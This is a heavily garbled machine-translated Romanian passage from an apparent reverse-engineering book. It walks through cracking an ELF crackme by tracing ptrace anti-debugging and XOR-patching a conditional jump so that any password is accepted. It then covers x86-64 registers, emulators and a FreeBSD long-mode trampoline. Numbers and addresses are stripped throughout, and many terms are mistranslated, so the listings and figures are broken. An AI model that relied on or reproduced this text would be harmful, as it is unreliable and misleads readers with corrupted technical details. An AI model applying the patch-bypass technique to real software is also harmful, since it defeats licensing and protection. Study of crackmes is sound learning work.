bytes shr ebx, ;Traducem octeți în Cuvinte duble mov edx, dword ;„Magic” constant Obeefcodah Call OS VS;Apelați AEG- Decoder MOV EE, Offsetunk e mov edx, F H CALL LOC A MOV EAX, IAH XOR ECX, ECX MOV ESI, ECX;Pointer la ascii-string;lungimealiniei;ieșire de linie pe ecran;\;+ anti -lansare pe baza;+ non-orientare PTRACE CAPITOLUL DESASAMBING FISCURI ELFpentru Linux și BSD VI !: V: int H, / Linux - SYS PTRACE: Sub Ebx, EAX Return CodeAnalysis: Test EAX, EAX Verbranger Verbranizer: JZ IOS scurt - -> Wavertor nu a fostdetectat: Mov Ex,: D MOV DL, H Debugger Descoperit: F Apelați LOC a Afișare de ieșire: JNP LOC -> Completarea programului: : iOS - ;Cod xref: start+ ej: JMPscurt iOS - c;Salt pe OS C = : V DB OBOH;Byte de gunoi: S: C LOC C;Codxref: start: LOC J: C Push EBX;Salvăm EBX după PTRACE: D MOV ECX, Offset;Poin on x Byte BufferDWORD : A MOV EDX, ;Câte caractere sunt numărate: A CALL LOC AA;Luați în considerare simboluri de la KLAVA: AS CALL IOS - C ;Verificare parolă + CRC: V XOR EBX, DWORD ;Analizarezultatelor auditului: v JZ scurt iOS - cc;-> parolă și CRC Genuină: v : v iOS - V ;Codxref: start+c j: v mov ecx, offset awrongpasswords;: pentru MOV DL, IDH;Parola sau CRC sunt incorecte: S Apelați LOC A;Concluzia blestemării pe ecran: S JMP iOS - c;-> finalizareaprogramului - S : C DB H;G;Gunoi: SV DB H; ;Gunoi: SS: SS LOC CC;Cod xref:start+AFJ: SS POP EBX;Turnăm EBX după PTRACE: CD Test EBX, EBX;A fost un debugger înainte: CF JNZscurt LOC B ;-> Debuggerul a fost descoperit anterior: DL MOV ECX, ASUCESSCONGRAT OFFSET;: d mov edx, h;Toate verificările au fost finalizate toate OK : DB Apelați IOS- A;Afișăm o felicitare pe ecran: E JNP iOS - C;-> finalizarea victoriei programului: e : e awrongpasswords db oah;Date Xref: Start:LOC B O: E db 'Parolă greșită, SorryOah: e db ah, : ASORRYBUTTHEPRO DB' scuze, dar procesulpare să fie urmărit ', Oah, : ;Date Xref: Start+ o: ASUCCESSCONGRAT DB ' -> Succes "Felicitări ", Oah: ; Date Xref: Start+C O Încărcare: dB' -> Puteți trimite methtetment/Comm 'încărcare: db' addr , oah, încărcare: C e; • unk e db ofah; date xref- bo este complet diferit! Însfârșit, am obținut un cod lizitabil, la sfârșitul textelor sunt vizualizate Lininiile greșite ale parolei, scuze șisuccesul felicitări Pe Cross- Partea IV Metode avansate de dizasamente cu sute de apropiere sunt o armăputernică împotriva protecției, conducând chiar în inima mecanismului de protecție În special, pentru a vedea, a vedea,pentru a vedea ce este codul care afișează mesajul despre parola incorectă, este suficient să traversezi legăturaîncrucișată către linia LOC - B Sufixul o La final denotă compensare, adică deplasarea Acest lucru sugerează căaceastă linie este abordată de deplasarea sa, ceea ce înseamnă că avem că avem rostul cu indicatorul De fapt, înaproximativCross of Line b h nu este și nu poate fi nimic interesant Acest cod afișează pur și simplu mesajul deparolă greșit pe ecran Justiția s -a întâmplat deja!Codul pe care îl verifică parola este într -un loc completdiferit In care?Vedem că, lângă linia b H, există o altă legătură încrucișată care duce la marcajul Start+C J Sufixul E implică rjump, adică un salt Acest lucru este deja mai interesant!Poate că aici este aceeași tranzițiecondiționată prețuită care decide dacă parola introdusă este corectată sau nu este minciună Aducem cursorul la linkulîncrucișat și apăsăm tasta IDA Pro ne transferă automat la locul potrivit la linia cfh Ei bine, totul estedestul de logic, funcția de pornire este situată la H, iar H + C H = OOCFH (listarea ) Listarea Împrejurimile codului, la care am fost aduși de un lanț de legături încrucișate încărcarea: SS POP EBX;Codxref: start: LOC îj încărcare: CD Test EBX, EBX;Verificarea EBX pentru egalitate la zero încărcare: CF JNZ scurt LOC B ;-> salt dacă ebx nu este zero încărcare: d mov ecx, offset asUCCSSCNGRT;Filiala„Parolă corectă” de la această adresă este într -adevăr o tranziție condiționată care compară conținutul registruluiEVLE cu zero, iar dacă nu este egală cu zero, există o tranziție la o subprogramă care afișează mesajul de parolă greșitpe ecran În caz contrar, controlul este primit de filiala care afișează succesul felicitări care vă felicită pentrusucces Dar dacă încercați să înlocuiți JNZ cu JZ?Atunci logica programului va fi complet inversată Parola corectă (pecare încă nu o știm) pe care o va percepe ca fiind cea greșită, iar parolele greșite vor percepe favorabil Întreagaproblemă este că programul este criptat, prin urmare, înainte de a păstra octeți, acesta trebuie descifrat În principiu,acest lucru se poate face folosind IDA Pro, dar va fi mai ușor să utilizați hiew -ul comercial sau un editor NTEgratuit, care poate fi descărcat de la http://www sourceforge net/projects/hte Să ne oprim alegerea pe aceasta din urmă,deși, spre deosebire de Hiew, nu poate edita fișierele ELF cu un titlu distorsionat în modul imagine Aceasta înseamnă cătrebuie să calculăm toate adresele virtuale pe cont propriu, dar nu trebuie să plătim Încărcăm fișierul în editor ($ /HTE Tiny-Crackme), Faceți clic pe (Mod) sau spațiul GAP, în caseta de dialog, selectați opțiunea ELF /Program(vizualizarea titlului software-ului care descrie The Soft segmente) și vezi un singur segment de intrare O(încărcare) Facem clic pe pentru a vizualiza atributele sale și vedem că începe cu o adresă virtuală de h, situată în fișier conform deplasării OH (Fig ) Prin urmare, adresa virtuală CFH (conform căreia seaflă tranziția noastră condiționată fără combustibil) corespunde deplasării ținutei Mergem aici ( , cfh, ) șivedem că aici este octetul H Acum trebuie să -l descifrăm, să -l corectăm și să -l criptăm din nou Cum să o facă?Defapt, există multe moduri și toate sunt corecte Cel mai simplu lucru este să aplici Xor La urma urmei, cheia de criptarene este cunoscută - f fih Dar iată întrebarea - ce parte a cheii este suprapusă acestui octet, cu alte cuvinte, estenecesar să aflați care dintre cei patru octeți este criptat?Este ușor să aflați matematic Începutul cifrei este situatla bh, nu?Apoi octetul nostru coincide cu momeala numărului cheie ( cfh - bh % ) Pentru a calcula valoareaacestei expresii în NT, este suficient să alegeți din meniul comenzii de editare |Evaluați și introduceți -l încalculator Se va dovedi zero Deci, octetul cfh este criptat de prima momeală a cheii Pe platforma X , aceasta seaflă la o adresă mai mică, adică în categoriile mai tinere ale numărului, GPAVA Dezasarea fișierelor ELF pentruLinux și BSD și, în acest caz, este FLH Fără a părăsi calculatorul, introducem expresia H lflh și obținem H, ceea ce corespunde exact OPCOD -ului instrucțiunii JNZ După cum urmează de la conducerea Intel,instrucțiunile JZ, la rândul lor, corespund Opdocod H Colectăm expresia H ~ flh în calculator și obținem H Aceastava fi valoarea criptată a opcodului JZ Facem clic pe pentru a activa modul de editare, scriem în locul H valoareade H și faceți clic pe pentru a păstra modificările pe disc După cum puteți vedea, doar un bit s -a schimbat dupăKhak, iar acest ritm a fost cel mai tânăr al numărului: H ( ) - " H ( ) Acest lucru se datoreazăfaptului că oppodii înșiși H ( ) și H ( ) diferă doar în liliacul mai tânăr, iar Xor este un pic deoperare!Orez Vizualizați atributele singurei note de segment cu alte cuvinte, dacă criptarea este efectuată prinaplicarea XOR, atunci pentru a transforma JZ în ​​JNZ (sau invers), indiferent de criptare, este suficient pentru ainversa bitul de seqatur cu cifrat mai tânăr!Și nu trebuie să vă încurcați cu toate aceste calcule!Ia acest truc pentrutine Va veni în continuare la îndemână Lăsăm editorul și cu înghețarea inimilor timy-crackme vai!El nuîncepe!Adică, începe, desigur, dar refuză să accepte parola De ce?Reveniți la linia CFH (chiar în care noi Am corectat tranziția condiționată) și am derulat ecranul Dizassembler până când vom întâlni următorul Link CrossStart+AFJ, ceea ce duce la linia ach Să vedem ce avem acolo (listarea ) Partea IV Metode avansate dedizassembing I Listarea Capcana anti-HAKER în încărcare minusculă: AS Încărcare: B Încărcare: B Încărcare: B CALL LOC C EBX, DWORD Scurt LOC CC;verificarea parolei și a CRC -uluidvs ;Analiza încărcării rezultatelor: v Încărcare: v LOC B :;Code Xref: Start+C | J Mov Ecx, offsetAwrongPasswords; "\ n Parolă greșită, scuze " Anti -haker Capc a fost găsită! O altă verificare și o altă tranzițiecondiționată localizată la v Returnată de funcția OS C , comparându -l Cu un cuvânt dublu DWORD șidacă OS C () Z'DWORD ! = , atunci tranziția condițională nu este executată, iar controlul primește osubprogramă care afișează un mesaj de eroare pe ecran Ce face funcția oc c ? a codului (pe care creatorul puzzle-ului ne -a promis -o) Pentru a neutraliza această verificare, trebuie să înlocuim JZ cu JNZ prin inversarea bitului demomeală mai tânăr, situat la b H Scăzând adresa virtuală de bază a segmentului, obținem că obținem Deplasareafizică conform căreia acest octet este localizat în fișierul ELF (în cazul nostru, este egal cu B H) Conform acestuiamestec, există un octet H Invertiți bitul mai tânăr, transformându -l în i (fig ), păstrăm modificări,bine Dim From NT, Lansați Timy-Crackme Ce?!Din nou nu începe!Asta înseamnă să hack orb fig Editareacodului criptat în NT fără decriptarea sa Ce se poate face aici?Revenim la prima noastră tranziție condiționată de cfh (vezi Lista ) și încercăm să analizăm ceea ce verifică exact Vedem că un cuvânt dublu este scos din parteade sus a stivei și este verificat pentru egalitatea zero Cum a ajuns acolo?GPAVA Demontarea fișierelor ELF pentruLinux și BSD Traversăm legătura încrucișată și vedem că, în linia ch, în partea de sus a stivei este aruncatăconținutul registrului EVCH (listarea ) Încărcare: S OS C :;Cod xref: start: LOC îj;Salvați EBXîn stivă și ce este Esh însuși?Răspunsul oferă o altă legătură încrucișată care ne conduce la codul afișat în lista Încărcare: V MOV EDX, Încărcare: INT H Încărcare: Sub EBX, EAX Sarcina: TestEAX, EAX Sarcina: JZ Short LOC ;Linux - sys ptrace;analiza valorii returnate;Wasteen descoperit?;-> Nuexistă debugger, totul este curat aici!Sistem Sys ptrace!Se dovedește că tranziția noastră condiționată în linia CFHnu a verificat deloc parola, dar prezența unui debugger (un program care este deja depanat nu poate apela PTRACE ) Darnu este așa Mai precis, deloc De îndată ce debuggerul îndeplinește tranziția condiționată din H, SRRY, darprocesul pare a fi urmărit este afișat pe ecran (scuze, procesul este probabil deja urmărit), iar cazul pur și simplu nuajunge la „tranziția condiționată a anului cfh !Orez Hacking -ul este finalizat, desigur, se aplică numaiacelor debuggeri care lucrează prin PTRACE Partea /și metodele avansate DizassMitter De fapt, creatorul puzzle -uluia aplicat un truc destul de viclean Tranziția condiționată CFH nu controlează nici parola corectă, nici prezențaunui debugger Este introdus la fel ca o momeală Mina-Lovushka Astfel, pentru a hack programul, este necesar să seschimbe o singură tranziție condiționată la adresa b H Tranziția condiționată CFH nu trebuie atinsă!Întrucât l-am atins deja, trebuie să returnăm totul la starea inițială, înlocuind h hacked cu h Păstrăm modificări în ,părăsim editorul hex și începem din nou programul Va funcționa cu adevărat de data asta?!Da!Funcționează (Fig ) Acum, programul percepe orice parolă introdusă ca fiind corectă, afișând inscripția victorioasă a succesului felicitări pe ecran Concluzia nu este cea mai ușoară crăpătură sub Linux, care arată tehnica de hacking de bază Desigur,acesta este un hacking murdar, la fel de cunoscut sub numele de Bit-Hack, și nu este absolut nimic de care să fiimândru Mai mulți hackeri îngrijiți analizează algoritmul de verificare a parolei și scriu un generator de taste(keygen), generând parole/numere de serie adecvate Aceasta este o operație mult mai complexă Cu toate acestea, iatăcâteva soluții gata pregătite pe care ar trebui să fie găsite hackerii începători Aici sunt: ​​□http://www crackmes de/users/yanisto/tiny crackme/solutioiis/tiocsti □http://www crackmes de/users/yanisto/tiny crackme/soiutioiis/krio Apropo, iată câteva parole adecvate: boom, v do,f k În teorie, după hacking, programul ar trebui să le perceapă ca fiind greșite (suntem, până la urmă A inversat o tranziție condiționată) Cu toate acestea, este destul de favorabilă pentru ei Deci puzzle -ul!Dar, de fapt,totul este mai simplu Creatorul CrackMe combinat într -un control de tranziție al integrității codului cu verificareacorectitudinii parolei Întrucât după hack, integritatea codului a fost ruptă, tranziția condiționată inversatăfuncționează întotdeauna, indiferent de parola introdusă În general, micuțul-crackme conține destul de multe secrete acoperă-l în timpul liber Obțineți multă plăcere Capitolul Arhitectura x - sub bisturiul din epoca de de biți aasamblatorului este un lucru al trecutului, predându-se sub atacul ideilor și platformelor noi Atât flagship-ul pieței(Intel și AMD) au prezentat arhitecturi pe de biți care deschid ușa către lumea vitezei mari și a procesoruluiproductiv Este o adevărată descoperire - noi registre, noi moduri de operare să încercăm să ne ocupăm de asta?Acestcapitol ia în considerare arhitectura AMD (aka x - ) și exemple de programe practice de dizassembing scrise pentruaceastă arhitectură Introducerea logo-ului arhitecturii pe de biți pare seducătoare, dar în termeni practice estedoar un truc de marketing viclean care ascunde nu numai avantaje, ci și dezavantaje Ni se oferă operanduri pe de bițiși adresare pe de biți S -ar părea că buzunarele nu trag descărcările suplimentare dacă nu sunt utile, atunci celpuțin nu vor interfera Dar acest lucru nu este deloc!Odată cu o creștere a descărcării, lungimea comenzilor mașiniicrește și, prin urmare, timpul încărcării/decodării lor, precum și dimensiunea programului Prin urmare, pentru a obțineperformanțe nu mai slabe, un procesor pe de biți trebuie să aibă o memorie mai rapidă și un cache mai capabil Acestaeste primul În al doilea rând, operandurile întregi pe de biți sunt potriviți pentru utilizare numai atunci cândprocesarea numerelor aproximativ + ( ) și mai mari În cazul în care un procesor pe de biți necesitămai multe măsuri, copii pe de biți într-unul Dar, pe de altă parte, unde ați văzut astfel de numere în aplicațiile deacasă și de birou?Nu degeaba, inginerii de la Intel au mers să reducă descărcarea de ALU (dispozitiv aritmetic-logic),„lățimea” căreia în Pentium- este de doar biți, față de de biți în Pentium-III Aceasta nu înseamnă că Pentium- nu poate prelucra numere de de biți Pot fi Doar el petrece mai mult timp pe ei decât Pentium-GP Dar, din moment ce,procentul de numere cu adevărat pe de biți (adică, astfel încât se folosesc mai mult de biți) în aplicațiile deacasă relativ scăzute, performanța scade ușor Dar miezul conține mai puține tranzistoare, eliberează mai puțină energietermică și funcționează mai bine la o frecvență crescută de ceas, adică, în general, se observă un efectpozitiv Dezgustător de biți ai milă!Adresa Memoria de momeală nu are nevoie nici măcarde Microsoft împreună cu toate scoici grafice!Din cele GB din spațiul de adrese al Windows Processional și WindowsServer, doar GB sunt alocate aplicațiilor GB este alocat doar de Windows Advanced Server și nu pentru că esteimposibil să se oprească mai mult!Procesoarele X sunt ușor abordate până la GB ( GB la cod, date, stivă șigrămadă), necesitând restructurarea minimă a sistemului de operare!De ce nu s -a făcut încă?De ce mai folosim„mizerabilul” GB, dintre care doar două sunt cu adevărat disponibile?!Da, pentru că nimeni altcineva nu are nevoie deel!Un sistem care se adresează GB, nu puteți vinde cine sunt interesați de aceste gigabyte?Iată logo-ul „pe debiți”-o chestiune complet diferită!Inspiră!Asta e în jurul lor și dansează ParteaIV Metodele avansate DizAssmit pentru a compara procesoarele pe și de biți nu au rost!Dacă procesorul pe debiți din aplicația „acasă” este mai rapid, atunci în niciun caz în detrimentul pe de biți, dar datorită trucurilorconstructive complet independente de acesta!Cu toate acestea, nu vom face despre SAD Arhitecturile pe de biți vorintra în continuare în viața noastră Pentru unele sarcini, acestea sunt pur și simplu indispensabile Aici, de exemplu,este criptografia de biți sunt octeți!Pe o astfel de arhitectură, parole simbolice pot fi încadrate pe deplinîntr-un singur registru, fără a apela la memorie, ceea ce dă un rezultat incredibil!Viteza serviciului crește aproape cuun ordin de mărime!Instrumentele necesare pentru programare în modul sunt de dorit să aibă un computer cu AMD AthlonFX sau Opteron Processor, dar, în cel mai rău caz, puteți face cu un emulator Nu există multe emulatoare pentruplatforma X - și toate sunt departe de a fi perfecte Cu toate acestea, pentru a face cunoștință cu AMD , vor fisuficiente și apoi lăsați pe toți să decidă pentru sine-dacă are nevoie de o arhitectură pe de biți sau nu EmulatorulBochs gratuit, distribuit în textele sursă, este foarte popular Suport pentru arhitectură x - a apărut pentru primadată în versiunea -RGZ și apoi a fost inclus în Eliberarea privind drepturile funcției experimentale Pe site -ul oficial (http://bochs sourceforge net/) putețigăsi mai multe ansambluri binare -eabile pentru diferite platforme, dar numai pentru arhitectură x Reacțiaversiunii pe de biți a Linux la o încercare de a o lansa sub controlul ansamblului standard al Bochs este prezentatăîn Fig Emulația X - necesită o compilare încrucișată obligatorie sub controlul UNIX Descărcați textele sursă(http://prdownloads sourceforge net/bochs- tar gz?download), despachetați configuratorul cu Cheia-Cheia-Cheia-Cheia-EPAI-K - și apoi dați comanda Take-ului (listarea ) Orez Reacția versiunii pe de biți a Linux la oîncercare de lansare sub asamblarea standard a lui Bochs O revizuire a emulatoarelor populare este prezentată încapitolul , „Emularea debuggerilor și a emulatorilor” În secțiunea a doua serie de sfaturi și recomandări utile pentrucompilarea manuală a codurilor sursă sunt prezentate „Potențialul ascuns al ansamblurilor manuale” Capitolul , „HackerInstrument pentru UNIX și Linux” Capitolul Arhitectură x - sub bisturiul unui asamblator Listing *asamblare a boch-urilor cu suport pentru emularea x - $ /Configurare-epaye-k - $ Faceți formularele un fișierBochs executabil, necesitând BIOS și BIHGS Script, care se formează, pe care îl puteți împrumuta din ansamblul binarfinisat Pentru compilare pentru platforma Windows, ar trebui să porniți scriptul Conf Win -VCPP, apoi să executațicomanda Make Win SNAP (listarea ) Pentru aceasta, desigur, este necesar să aveți Linux, deoarece Windows nu estecapabil să funcționeze corect cu scripturile shell Desigur, puteți utiliza pachetul Cygwin (http://www cygwin com/), daradunarea cu acesta nu vă va salva de probleme Listarea Asamblarea Bochs'a pentru compilarea JMicrosoft Visual C ++J Win -VCPP face Win SNAP Assembly Assembly Microsoft Visual C ++ nu este foarte neted (mai precis, nu trecedeloc) și trebuie să eliminați numeroase erori Realizate de dezvoltatorii emulatorului, este nevoie de timp șicalificări Dacă doriți să vă deplasați pe calea cea mai mică rezistență, atunci căutați ansambluri Bochs gata făcute înrețea cu suport pentru arhitectură pe de biți Unul dintre ei este disponibil pentru descărcare aici:http://www psyon org/bochs-win /bochs-x - - exe Cu toate acestea, Bochs nu face față activității sale în celmai bun mod Multe clone Linux pe de biți „zboară” în faza de încărcare a nucleului Este încă posibil să răsfățațimodul X - pentru Bochs (Fig ), dar nu este potrivit pentru lucrări constante și sistematice Cu toate acestea, înversiunile ulterioare, erorile de emulare sunt probabil corectate, iar singurul dezavantaj va rămâne viteză mică Înorice caz, proprietarii procesoarelor cu putere redusă într-un fel sau altul vor trebui să caute altceva QEMU este unemulator dinamic gratuit bazat pe Bochs Arhitectura X - este emulată pe Pentium-S cu o viteză mai proastă decât x sub versiunea comercială a VMWAIE (Fig ) Stabilitatea lucrării este, de asemenea, dincolo de laudă Pe site -uloficial (http://fabrice bellard free fr/qemu/) sunt postate textele sursă și ansamblurile pregătite pentruLinux Proprietarii de Windows trebuie să compilam pe cont propriu sau să cerceteze în căutarea unei producții derețea Adunarea este de bună credință pe un server japonez bun http://www h dion ne jp/~qemu-wiii/ Acolo puteți găsi, deasemenea, un accelerator de șofer care accelerează emulația de mai multe ori Apropo, pe lângă X - , QEMU emulează X ,SPARC, PowerPC și alte arhitecturi În plus, QEMU este singurul emulator în care rețeaua virtuală se ridică fără problemeși nu înfundă principalul sistem de operare cu adaptoare virtuale În cele din urmă, pe lângă emulatoare, vom avea nevoiede un sistem de operare pe de biți Este posibil să ajungeți la registre pe de biți și la alte caracteristicipromițătoare ale arhitecturii x - doar dintr-un mod special pe de biți, cunoscut sub numele de „modul lung” Niciîn realitate, nici sub modul X protejat pe de biți, nu sunt disponibile Deși în acest capitol se va arăta cum setraduce procesorul de la regimul real la de biți, crearea unui sistem de operare funcțional complet nu este inclusăîn planurile noastre!Cel mai simplu mod, desigur, este să luați Windows XP Edition pe de biți, dar nu toțihackerii împărtășesc această cale Linux este potrivit în acest scop mult mai bine Majoritatea producătorilor au lansatversiuni x - sau vor face acest lucru în viitorul apropiat Adepții calității tradiționale germane pot fi recomandatede Suse LiveCD , care nu necesită instalare (http://suse osuosl org/suse/x /live-cd- /suse-linux- -livecd- bit iso )O alegere bună va fi Debian, portul neoficial al căruia în formatul BusinessCard-CD se aflăla http://cdimage debian org/cdimage/uioffidal/sarge-amd /iso-cd/debian-md -businecard iso Acolo puteți găsi și alteporturi Partea IV Metode avansate Fig De dezasamblat Asamblarea specială a Bochs intră cu succes în modul X - , simțindu-se cu încredere submașina virtuală VMware (adică, de fapt, se dovedește dublu emulare) Fig Încărcarea distribuției pe de biți LinuxDebian sub emulatorul QEML) GPAV Arhitectura x - sub bisturiul asamblatorului va trece acum la pregătireainstrumentelor de cercetare Cel puțin, avem nevoie de un asamblator și un depanator Vom folosi FASM(http://flatasmbler net/) Este gratuit, funcționează sub Linux/Windows/MS-DOS, acceptă arhitectura X - , are o sintaxăconvenabilă, etc Iubitorii MASM pot descărca platforma gratuită Windows Server SP (http://www microsoftcom/downloads/ Detalio aspx? FamilyId = A B B -E F- EA -A E- C EC F E ), care include masmă pe de biți În mod sintactic, ambii acești asamblatori sunt incompatibili, astfel încât se recomandă să aleagă imediat înfavoarea unuia dintre ei Aproape toate porturile X - de Linux includ debuggerul GNU, ceea ce este suficient pentrusarcinile noastre Proprietarii Windows pot utiliza Microsoft Debugger, care face parte din instrumentele gratuite dedepanare Microsoft (http://www microsoft com/whdc/devtools/debuging/ installAmdbeta mspx) O revizuire a arhitecturiix - pentru o descriere detaliată a arhitecturii x - este cea mai bună pentru a contacta documentația companiei„AMD Technology-AMD Arhitectură Programator Volumul : Programarea aplicațiilor” (http://www md com/ US-en/en/en/en/en/en/en/en/en/en/en/en/en/en/unstent /wliitej>pers and tech docs^ pdf)- Ne vom limita doar la orecenzie curioasă a The Curs Principalele inovații În cele din urmă, AMD a avut milă de noi și le -a oferitprogramatorilor că toată lumea aștepta atât de mult timp Alte opt au fost adăugate la șapte registre generale de scopuri(opt - luând în considerare ESP), ca urmare a numărului total al acestora la (Fig ) Registrele generale pe debiți MMX și Registrele de date cu un KHMM cu de date cu de date de registre de programare a aplicațiilor includ,de asemenea, Registrul de control și starea unui model de programare pe de biți (registrul de control și stareamedia pe de biți, MXCSR) și Registrele de cuvinte de etichetă (TAG Word), controlul cuvântului (cuvânt de control)și starea de stat pentru instrucțiunile x privind registrele x moștenite, acceptate în toate modurile B&Y D, [șQ/Zi,acceptate în moduri de orez pe de biți de orez Registrele disponibile în modul x - , registrele vechi s-auextins la de biți, au primit numele RAX, RBX, RCX, RDX, RBP, RSI, RDI, RSP, RIP și RFLAGS Noile registre au rămasfără nume și au fost numerotate pur și simplu de la R la R Pentru a apela la tinerii , și de biți de noiregistre, puteți utiliza sufixele B, W și D, respectiv De exemplu, R este un registru pe de biți, R b este octetulsău mai tânăr (prin analogie cu Al), iar R W este cel mai tânăr cuvânt (același ca în EAX) Moștenitori direcți aianului, Partea a IV -a Din păcate, metodele avansate DizAssmit nu sunt observate, iar operațiunile de forfecare șimatematică trebuie utilizate cu partea de mijloc a registrelor Registrul de comandă RIP este acum abordat în același modca toate celelalte registre cu scop general Luați cel mai simplu exemplu: descărcați următoarea echipă de mașini înregistrul al ol ole Pe platforma x , trebuie să faceți așa cum este afișat în lista ;Listarea ”ÎncărcareaBPCOD a următorului comandă a mașinii din Kasiic X Call $ + ;Lucruri la adresa de sticlă a următoarei comenzi;Șicontrolul transferului către acesta Pop ebx;Turnați adresa de întoarcere din stivă Adăugați EBX, B;Reglați adresa ladimensiunea comenzilor Pop/Adăugare/MOV mov al, [ebx];Acum Al conține opcodul comenzii NOP NOP;Echipa a cărei opcod vremsă descărcăm în AL Ce cod voluminos și complex!În plus, este foarte ușor să faceți o greșeală aici în dimensiuneacomenzilor pe care trebuie să le calculați manual sau să înghețați listarea cu nimeni necesară În plus, stiva esteinevitabil atinsă aici, care, în unele cazuri, este nedorită sau inacceptabilă (în special în mecanismele de protecțieumplute cu tehnici anti -cy) Și acum rescriem același exemplu pentru platforma x - (listarea ) Mov al,[rip];Încărcăm opcod -ul echipei de mașini următoare NOP;Echipa a cărei opcod vrem să descărcăm în AL Frumusetea!Doartrebuie amintit că RIP indică întotdeauna următorul și, în niciun caz, la instrucțiunea curentă!Din păcate, nici JX RIP,nici nu apelează la lucru Pur și simplu nu există astfel de echipe în Lexicon X - Dar asta este!Adresa absolută adispărut, iar acest lucru este mult mai rău Dacă trebuie să schimbăm conținutul celulei de memorie la o adresăspecifică, acționăm aproximativ pe x , așa cum se arată în lista Decbete PTR [ H];Reduceți conținutul octetuluila adresa BBB pe unitate Sub x - Traducătorul dă o eroare de asamblare, forțându -ne să recurgem la o bază fictivă (lista ) ■ Listarea Utilizarea fazei fictive pe x - pentru adresarea absolută • Hog G , G ;Bateți registrul G Dec byte ptr[r + h];Reduceți conținutul octetului;la adresa O+BBBI pe unitate Există și alte diferențe față de x , dar nu maisunt atât de fundamentale Este important ca în modul de compatibilitate cu X (modul Legacy), nici registrele pe debiți și nici noi metode de adresare nu sunt disponibile!Nu le puteți atinge cu niciun mijloc și, înainte de a face ceva,este necesar să convertiți procesorul într-un mod „lung”, care este împărțit în două subcutricule: modul decompatibilitate cu x (modul compatibolyty) și modul pe de biți ( Modul -Bit) Regimul cu programatori, care aufăcut un PDP- viu, doar mormăie disprețuitor în mod disprețuitor, adevăruri evidente au început să ajungă ladezvoltatorii RS, care au fost realizate pe toate platformele normale de foarte mult timp GPAVA Arhitectură x - sub bisturiul asamblatorului de capacitate estefurnizat doar astfel încât sistemul de operare pe de biți să poată efectua aplicații vechi pe de biți Nu sefolosesc aici registre de de biți, deci nu avem în vedere acest regim Adevăratul pe de biți trăiește doar într-unmod lung pe de biți, despre care vom vorbi!Modurile de lucru ale procesorului AMD- și principalele caracteristiciale acestora sunt enumerate pe scurt în tabel Tabelul Modurile de funcționare ale procesorului AMD- șicaracteristicile lor în modul de operare Sistemul de operare necesar trebuie să compilreze aplicațiile caracteristicilorextinderii implicite a registrelor tipice scopului general al dimensiunii adresei (în biți) dimensiunea dimensiuniiOperandul (în biți) Mod lung (modul lung) pe biți nou pe biți DES și MODE DE COMPATIBILITATE NR Regim moștenit (Mod Legacy) Mod protejat moștenit pe biți Nr nr Regim virtual Mod realmoștenit pe biți tranziție la modul pe de biți În codurile sursă FreeBSD Puteți găsi fișierul AMD TRAMP S,care este rapid, dar nu și nuProcesorul se traduce într-un regim pe de biți destul de corect După ce a fost compilat,acesta poate fi scris în sectorul de pornire care încarcă propriul sistem de operare (dacă îl scrieți) sau să compunețiun fișier COM lansat din regimul reale X (acest lucru va necesita MS-DOS pur fără extensori) În general, există multeopțiuni Fișierul AMD TRAMP S este afișat în lista Listarea Transfer de procesor în modul -bit // $freebsd: /epcman/r/ncvs/src/sys/boot/i /libi /and tramp s s, / / / * Tranpoline rapid și murdar pentru aobține obținerea In In in in in in in in in in in in in int in in int in Intel bit (lung) în modul și rularea * cupaginare activată, astfel încât să intrăm în kernel la adresa sa legată * (O tranziție rapidă, dar nu în întregimecorectă la un mod pe de biți (lung) * cu pompare activată, care vă permite să intrați în kernel la adresa saaferentă */ #Define MSR EFER HS #DEFINE EFER LME x PARTE PARTEA PARTEA PARTEA PARTEA PARTEA PARTEA PARTEA PARTEA PARTEA PARTEA PARTEA CR PAE X #DEFINE CR PSE X #DEFINE CR PG X /* GRRR se ocupă de instrucțiunile VTH care se referă la adresa inutilă) x) ((x) +vpbase) Data -p align x globi PT PT : space x Globi PT PT : space x -Globi PT : x GDTDESC : Word -Long -Long Gdtend -Gdt VTOP (GDT) GDT: -Long Long Long x –Long x Long x Long x GDTEND: -Text Code Globi AMD TRANP AMD TRAMMP: /* FIE Întrerupe* că întreruperile sunt blocate) Cli/* Porniți efer lme* / /* (Activăm efer lme) */ movl $ msr efer, %ecx rdmsr ori $ efer lme, %eax wrmsr/ * porniți pae */* activați extinderea adreselor fizice (adresă fizică * extensie, paradis) */ movl %cr , EAAX Capitolul Arhitecturăx - sub bisturiul unui asamblator Ori $ (CR PAE I CR PSE), %MOVL %EAX, %SG / * Set %CR pentru RT * / / *Instalați %din SGZ pe RT * / Movl $ vtop (pt ), %movl %eah, %sgz / * tum la paginare (setează implicit efer lma) * / /* activați swagging (implicit instalat efer lma) * / movl %cro, %eax orri $ cr pg , %Eax movll %eax, %CRO /* Acumsuntem în modul de conpatabilitate, setați %CS timp îndelungat Modul * / / * a intrat în modul de compatibilitate Instalăm %CS pentru regimul lung */ movl $ vtop (gdtDESC), %movl vtop(intrare hi), %eSi movl vtop (Entry lo), %edi igdt ( %eax) ijmp $ x , $ vtop (longmode) : / * Încă rulăm v = p, sărițila punctul de intrare * / / * încă efectuați v = p, trecerea la punctul de intrare * / movl %eSI, %salq $, %rax orq%rdi, %rax Programul Pushq %RAX RET „Hello, World” pentru programarea X - pentru o versiune pe de biți a Windows-ului nu este mult diferită de cea tradițională, doar toate operandurile și adresele în mod implicit pe de biți șiparametrii Ari-funcția Ari-Funcție sunt transmise prin registre, mai degrabă decât prin stivă Primele patru argumenteale tuturor funcțiilor ARI sunt transmise în registrele RCX, RDX, R și R (Registrele sunt listate în OrdinulArgumentelor, argumentul de stânga extremă este plasat în RCX) Parametrii rămași sunt plasați pe stivă Acest mecanism senumește un acord privind transmiterea rapidă a parametrilor pentru x - (x - Convenția de apel rapid) Descrierea sadetaliată poate fi găsită în articolul „Istoria convențiilor apelurilor, partea AMD ”(http://blogs msdn com/oldnewthing/archive/ / / / anspx) De asemenea, este util să analizați compilatorulgratuit Pascal și să ridicați documentația despre metodele de apel ARI:http://www freepascal org/wiki/index php/win /amd api În special, apelul funcțiilor cu cinci argumente API FUNC( ) arată așa cum se arată în lista Mov dword ptr [RSP+ H], MOV R D, MOV R D, MOV EDX, MOV ECX, CALL API FUNC;Pune cel de -al cincilea argument pe al cincilea din stânga ;Transferăm al patrulea din stângaargumentul ;Transmitem al treilea argument din stânga ;Transferim al doilea argument din stânga ;Transmitem primulargument din stânga Partea IV Metode avansate de dizassembing, schimbarea celui de -al cincilea argument cu privirela vârful stivei necesită explicații De ce este egal cu oh?La urma urmei, adresa de 